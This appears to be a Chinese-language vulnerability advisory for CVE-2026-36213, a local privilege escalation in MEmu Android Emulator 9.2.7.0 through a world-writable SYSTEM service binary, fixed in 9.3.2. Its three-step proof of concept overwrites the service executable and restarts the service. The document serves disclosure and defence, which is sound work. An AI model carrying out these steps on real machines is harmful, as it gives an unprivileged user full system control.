sec-zone/CVE-2026-36213

# CVE-2026-36213 CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 因不安全的服务二进制文件权限导致的本地权限提升 | 已在 9.3.2 版本中修复 # CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE     ## 摘要 **MEmu Android Emulator 9.2.7.0** 中存在一个本地权限提升（LPE）漏洞。 服务 `MEmuSVC` 以 `NT AUTHORITY\SYSTEM` 权限运行，但其二进制文件允许任何本地用户进行写入，从而导致系统可被完全接管。 | 字段 | 详情 | |-------|---------| | **CVE** | CVE-2026-36213 | | **产品** | MEmu Android Emulator (MicroVirt) | | **受影响版本** | 9.2.7.0 及更早版本 | | **修复版本** | 9.3.2 | | **CWE** | CWE-732 / CWE-269 | | **CVSS v3.1** | 7.8 HIGH `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` | | **ATT&CK** | [T1574.010](https://attack.mitre.org/techniques/T1574/010/) | ## 漏洞详情 `MEmuService.exe` 被作为 SYSTEM 级别的 Windows 服务安装，但其 NTFS 权限配置不安全： ``` icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe" BUILTIN\Users:(F) ← Any local user has Full Control Everyone:(F) ← World-writable binar ``` ## 概念验证 :: 步骤 1 - 验证漏洞权限 ``` icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe" ``` :: 步骤 2 - 替换二进制文件（以低权限用户身份） ``` copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y ``` :: 步骤 3 - 重启服务 ``` sc stop MEmuSVC && sc start MEmuSVC ``` :: 结果：malicious.exe 以 NT AUTHORITY\SYSTEM 权限运行 ## 检测脚本 可在以下地址获取：https://github.com/sec-zone/Hijack-service-binaries ## 免责声明 本研究是出于教育目的，在负责任的漏洞披露政策下进行的。 作者不对任何滥用此信息的行为负责。 ## 研究员 姓名：Mohammad Hossein Ashofte Yazdi Linkedin：https://www.linkedin.com/in/seczone64 Twitter：@sec_zone64 邮箱：sec.zone64@gmail.com

标签：AI合规, PoC, 暴力破解, 本地提权, 权限管理, 模型越狱